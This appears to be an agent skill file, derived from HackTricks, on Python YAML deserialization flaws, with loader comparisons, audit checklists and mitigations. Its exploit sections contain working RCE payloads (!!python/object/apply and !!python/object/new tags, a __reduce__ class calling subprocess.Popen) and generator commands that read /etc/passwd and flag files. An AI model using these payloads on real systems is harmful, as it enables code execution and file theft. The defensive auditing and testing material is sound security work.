Hacktricks-skills python-yaml-deserialization

Security skill for understanding, testing, and mitigating Python YAML deserialization vulnerabilities. Use this skill whenever the user mentions YAML deserialization, PyYAML security, Python RCE through YAML, deserialization attacks, or needs to audit code for unsafe yaml.load() usage. Also trigger for requests about safe YAML loading practices, payload generation for authorized security testing, or explaining how !!python/object tags work.

Source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/pentesting-web/deserialization/python-yaml-deserialization/SKILL.MD

Python YAML Deserialization Security

This skill helps you understand, test, and mitigate YAML deserialization vulnerabilities in Python applications. Use this for authorized security testing only.

Understanding the Vulnerability

PyYAML can deserialize Python objects, not just raw data. This becomes dangerous when untrusted input is deserialized with unsafe loaders.

How Serialization Works

import yaml

# Plain data - serialized without any Python-specific tag
print(yaml.dump(str("lol")))
# Output:
# lol
# ...

# Python-specific objects - serialized with !!python/ tags
print(yaml.dump(tuple("lol")))
# Output:
# !!python/tuple
# - l
# - o
# - l

print(yaml.dump(range(1,10)))
# Output:
# !!python/object/apply:builtins.range
# - 1
# - 10
# - 1

The !!python/ tags mark Python-specific objects. Tags such as !!python/object/apply tell an unsafe loader to call an arbitrary callable during deserialization, which is what makes code execution possible.
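As a rough illustration of how these tags can be spotted before anything is constructed, the sketch below walks the parser events of a document and collects every tag in the `python/` namespace. The helper name `find_python_tags` is hypothetical; it relies on `yaml.parse()`, which parses the stream without running any constructors.

```python
import yaml

# Fully resolved form of the "!!python/" shorthand.
PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"


def find_python_tags(text):
    """Return Python-specific tags found in a YAML document.

    Only the parser runs here; no objects are constructed.
    """
    found = []
    for event in yaml.parse(text, Loader=yaml.SafeLoader):
        # Only node events (scalar, sequence start, mapping start) carry a tag.
        tag = getattr(event, "tag", None)
        if tag and tag.startswith(PYTHON_TAG_PREFIX):
            found.append(tag)
    return found


print(find_python_tags("!!python/object/apply:time.sleep [2]"))
print(find_python_tags("name: test"))
```

A scan like this is only a triage aid for logs or stored documents. It does not replace loading untrusted input with a safe loader.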

Safe vs Unsafe Loaders

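| Function | Loader | Safe? | Notes |
|---|---|---|---|
| safe_load() | SafeLoader | ✅ Yes | Only basic types |
| safe_load_all() | SafeLoader | ✅ Yes | Only basic types |
| load() (no Loader) | Version-dependent | ❌ No | <5.1: unsafe Loader; 5.1 through 5.4.x: warns and falls back to FullLoader; ≥6.0: raises TypeError |
| load(Loader=Loader) | Loader | ❌ No | Deserializes objects |
| load(Loader=UnsafeLoader) | UnsafeLoader | ❌ No | Deserializes objects |
| load(Loader=FullLoader) | FullLoader | ❌ No | Exploitable before 5.4; later releases reject !!python/object/apply and !!python/object/new, but SafeLoader remains the right choice for untrusted input |
| unsafe_load() | UnsafeLoader | ❌ No | Deserializes objects |
| full_load() | FullLoader | ❌ No | Same behavior as load(Loader=FullLoader) |

Key insight: yaml.load() without a Loader is never a safe default. Before PyYAML 5.1 it used the unsafe Loader; 5.1 through 5.4.x emit a warning and fall back to FullLoader; PyYAML ≥6.0 makes the Loader argument mandatory and raises TypeError when it is missing. Explicitly passing Loader or UnsafeLoader enables arbitrary object deserialization, and FullLoader should be treated as unsafe for untrusted input.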
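The difference between loaders can be observed with a harmless probe. The sketch below assumes PyYAML 5.1 or later, where `FullLoader` and `UnsafeLoader` exist. It asks each loader to call `builtins.len("abc")` through a `!!python/object/apply` tag and reports whether the loader constructs the value or rejects the tag. The names `PROBE` and `probe_loader` are illustrative only.

```python
import yaml

# Harmless probe: asks the loader to call builtins.len("abc").
PROBE = '!!python/object/apply:builtins.len ["abc"]'


def probe_loader(loader_cls):
    """Report whether a loader class constructs the probe or rejects it."""
    try:
        value = yaml.load(PROBE, Loader=loader_cls)
    except yaml.YAMLError:
        # Loaders that do not know the tag raise a ConstructorError,
        # which is a subclass of YAMLError.
        return "blocked"
    return f"constructed {value!r}"


for name in ("SafeLoader", "FullLoader", "UnsafeLoader"):
    print(name, "->", probe_loader(getattr(yaml, name)))
```

`SafeLoader` rejects the tag and `UnsafeLoader` returns the result of the call. `FullLoader` rejecting this particular probe does not make it suitable for untrusted input, since its restrictions have been bypassed in past releases.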

Basic Exploits

Simple Command Execution

import yaml
from yaml import UnsafeLoader

# Execute sleep command
data = b'!!python/object/apply:time.sleep [2]'
yaml.load(data, Loader=UnsafeLoader)  # Sleeps for 2 seconds

RCE via Custom Payload

import yaml
import subprocess

class Payload:
    def __reduce__(self):
        # yaml.dump() records this (callable, args) pair as a python/object/apply tag
        return (subprocess.Popen, ('ls',))

# Serialize the payload
serialized = yaml.dump(Payload())
print(serialized)
# Output:
# !!python/object/apply:subprocess.Popen
# - ls

# Deserialize (executes the command)
yaml.load(serialized, Loader=yaml.UnsafeLoader)

Legacy Exploit (Old PyYAML Versions)

For PyYAML <5.1, where yaml.load() without a Loader was vulnerable:

!!python/object/new:str
state: !!python/tuple
  - 'print(getattr(open("flag.txt"), "read")())'
  - !!python/object/new:Warning
    state:
      update: !!python/name:exec

Or the one-liner variant:

!!python/object/new:str {
  state:
    !!python/tuple [
      'print(exec("print(open(\"flag.txt\",\"r\").read())"))',
      !!python/object/new:Warning { state: { update: !!python/name:exec } },
    ],
}

Generating Payloads

Use the generate_yaml_payload.py script (bundled with this skill) to create test payloads:

python scripts/generate_yaml_payload.py --command "cat /etc/passwd" --output payload.yaml

Or use the external tool python-deserialization-attack-payload-generator:

python3 peas.py
# Enter RCE command: cat /root/flag.txt
# Enter OS: linux
# Select Module: PyYAML
# Done! Check /tmp/example_yaml

Auditing Code for Vulnerabilities

Vulnerable Patterns

# ❌ VULNERABLE - explicit unsafe loader
yaml.load(data, Loader=yaml.UnsafeLoader)
yaml.load(data, Loader=yaml.Loader)

# ❌ RISKY - FullLoader was exploitable before PyYAML 5.4; do not use it for untrusted input
yaml.load(data, Loader=yaml.FullLoader)
yaml.full_load(data)

# ❌ VULNERABLE - unsafe function
yaml.unsafe_load(data)

# ❌ VULNERABLE - no Loader argument
yaml.load(data)  # <5.1: unsafe Loader; 5.1 through 5.4.x: FullLoader plus a warning; ≥6.0: TypeError

Safe Patterns

# ✅ SAFE - use safe_load
yaml.safe_load(data)
yaml.safe_load_all(data)

# ✅ SAFE - name SafeLoader explicitly (behaves the same on every PyYAML version)
yaml.load(data, Loader=yaml.SafeLoader)

# ✅ SAFE - load with safe_load, then validate the shape of the result
config = yaml.safe_load(raw_text)
if not isinstance(config, dict):
    raise ValueError("expected a mapping at the top level")

Quick Audit Checklist

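  1. Search the codebase for yaml.load(, yaml.load_all(, yaml.unsafe_load( and yaml.full_load(
  2. Check whether a Loader argument is specified
  3. If the Loader is UnsafeLoader or Loader → VULNERABLE. FullLoader → VULNERABLE on PyYAML <5.4 and best replaced with SafeLoader on any version
  4. If the code uses unsafe_load() → VULNERABLE. Treat full_load() like FullLoader
  5. Check the PyYAML version: without a Loader, <5.1 uses the unsafe Loader and 5.1 through 5.4.x fall back to FullLoader
  6. Verify that all YAML input comes from trusted sources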
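The first four checklist steps can be partly automated. The following is a minimal sketch using only the standard `ast` module; the function `audit_source` and its messages are hypothetical, and it only recognizes calls written literally as `yaml.<function>(...)`. Aliased imports such as `import yaml as y` or `from yaml import load` would need extra handling.

```python
import ast

UNSAFE_FUNCS = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}
LOAD_FUNCS = {"load", "load_all"}
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}


def _name_of(node):
    """Return the trailing identifier of a Name or Attribute node, else None."""
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return None


def audit_source(source, filename="<string>"):
    """Return sorted (line, message) pairs for yaml loading calls worth reviewing."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call) or not isinstance(node.func, ast.Attribute):
            continue
        if _name_of(node.func.value) != "yaml":
            continue  # only calls spelled yaml.<func>(...)
        func = node.func.attr
        if func in UNSAFE_FUNCS:
            findings.append((node.lineno, f"yaml.{func}() may construct Python objects"))
        elif func in LOAD_FUNCS:
            # The Loader can be passed by keyword or as the second positional argument.
            loader_node = next((kw.value for kw in node.keywords if kw.arg == "Loader"), None)
            if loader_node is None and len(node.args) >= 2:
                loader_node = node.args[1]
            if loader_node is None:
                findings.append((node.lineno, f"yaml.{func}() without Loader: depends on PyYAML version"))
                continue
            loader = _name_of(loader_node)
            if loader not in SAFE_LOADERS:
                shown = loader or "<expression>"
                findings.append((node.lineno, f"yaml.{func}(Loader={shown}) may construct Python objects"))
    return sorted(findings)


SAMPLE = '''
import yaml
a = yaml.safe_load(text)
b = yaml.load(text, Loader=yaml.SafeLoader)
c = yaml.load(text, Loader=yaml.UnsafeLoader)
d = yaml.load(text)
e = yaml.unsafe_load(text)
'''

for line, message in audit_source(SAMPLE):
    print(f"line {line}: {message}")
```

Compared with a plain text search, parsing the source avoids matches inside comments and strings and makes it possible to inspect the Loader argument directly.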

Mitigation Strategies

1. Always Use safe_load()

# Replace all unsafe loading with safe_load
data = yaml.safe_load(file_content)
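
One way to apply this consistently is to route all untrusted input through a single helper. The sketch below is an assumption about how such a wrapper might look: the name `load_untrusted_config`, the size limit, and the requirement that the document be a mapping are illustrative choices, not part of PyYAML.

```python
import yaml

MAX_YAML_BYTES = 1_000_000  # hypothetical limit; tune per application


def load_untrusted_config(text):
    """Parse untrusted YAML with SafeLoader and check the top-level shape."""
    if len(text.encode("utf-8")) > MAX_YAML_BYTES:
        raise ValueError("YAML document too large")
    try:
        data = yaml.safe_load(text)
    except yaml.YAMLError as exc:
        # Covers syntax errors as well as rejected tags such as !!python/object/apply.
        raise ValueError(f"invalid or disallowed YAML: {exc}") from exc
    if not isinstance(data, dict):
        raise ValueError("expected a mapping at the top level")
    return data


print(load_untrusted_config("name: test\nvalue: 123"))
```

Keeping the call in one place also simplifies auditing, because any other use of a yaml loading function in the codebase becomes a finding by itself.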

2. Validate Input Source

# Allow full object deserialization only for YAML you fully control
if source == "internal_config":
    data = yaml.load(content, Loader=yaml.Loader)  # OK for trusted data only
else:
    data = yaml.safe_load(content)  # Required for untrusted data
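
When the only reason for using an unsafe loader on internal files is a custom type, a narrower option is to register that one type on a subclass of `SafeLoader`. The sketch below assumes a hypothetical `!endpoint` tag and `Endpoint` class; `add_constructor` and `construct_mapping` are existing PyYAML APIs.

```python
from dataclasses import dataclass

import yaml


@dataclass
class Endpoint:
    host: str
    port: int


class ConfigLoader(yaml.SafeLoader):
    """SafeLoader subclass that additionally understands the !endpoint tag."""


def construct_endpoint(loader, node):
    # Build the mapping with safe constructors only, then validate the fields.
    fields = loader.construct_mapping(node, deep=True)
    return Endpoint(host=str(fields["host"]), port=int(fields["port"]))


# Registered on the subclass, so plain SafeLoader stays unchanged.
ConfigLoader.add_constructor("!endpoint", construct_endpoint)

DOC = "primary: !endpoint {host: example.internal, port: 8443}"
config = yaml.load(DOC, Loader=ConfigLoader)
print(config["primary"])
```

This keeps every `!!python/` tag rejected while still allowing the application to define the exact set of objects a document may create.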

3. Use Alternative Formats

Consider JSON for data interchange. The standard json module only produces dicts, lists, strings, numbers, booleans, and None, so it has no equivalent of object-constructing tags:

import json

# json.loads() never instantiates arbitrary classes
data = json.loads(json_string)

4. Pin PyYAML Version

# pyproject.toml
[project]
dependencies = ["pyyaml>=6.0"]  # 6.0+ requires an explicit Loader for yaml.load()
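
A version constraint can be complemented by a check at startup or in CI. The helper below is a sketch that maps a PyYAML version string to the behavior of `yaml.load(data)` when no Loader is given; the function name and the returned descriptions are illustrative.

```python
import re


def default_load_behaviour(version):
    """Describe what yaml.load(data) without a Loader does for a PyYAML version string."""
    match = re.match(r"(\d+)\.(\d+)", version)
    if not match:
        raise ValueError(f"unrecognised version: {version!r}")
    major_minor = (int(match.group(1)), int(match.group(2)))
    if major_minor < (5, 1):
        return "unsafe: defaults to the object-constructing Loader"
    if major_minor < (6, 0):
        return "warns and falls back to FullLoader"
    return "TypeError: the Loader argument is required"


for v in ("3.13", "5.3.1", "5.4.1", "6.0.1"):
    print(v, "->", default_load_behaviour(v))
```

In an application, the installed version would typically come from `yaml.__version__`.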

Testing Your Application

1. Check for Vulnerable Loaders

grep -r "yaml.load" --include="*.py" .
grep -r "UnsafeLoader" --include="*.py" .
grep -r "FullLoader" --include="*.py" .

2. Test with Payload

# test_yaml_vuln.py
import yaml

# Harmless timing probe: an unsafe loader sleeps for one second
test_payload = b'!!python/object/apply:time.sleep [1]'

try:
    # Swap in the loader (or parsing entry point) your application actually uses
    yaml.load(test_payload, Loader=yaml.UnsafeLoader)
    print("VULNERABLE: Object deserialization enabled")
except yaml.YAMLError as e:
    print(f"Safe: {e}")

3. Verify safe_load Works

import yaml

# This should work
safe_data = yaml.safe_load("name: test\nvalue: 123")
print(safe_data)  # {'name': 'test', 'value': 123}

# This should fail
try:
    yaml.safe_load("!!python/object/apply:time.sleep [1]")
except Exception as e:
    print(f"Correctly blocked: {e}")

When to Use This Skill

Use this skill when you need to:

  • Audit Python code for YAML deserialization vulnerabilities
  • Generate test payloads for authorized security testing
  • Understand how !!python/object tags work
  • Learn safe YAML loading practices
  • Explain deserialization attacks to stakeholders
  • Convert vulnerable yaml.load() calls to safe alternatives
  • Test applications for RCE via YAML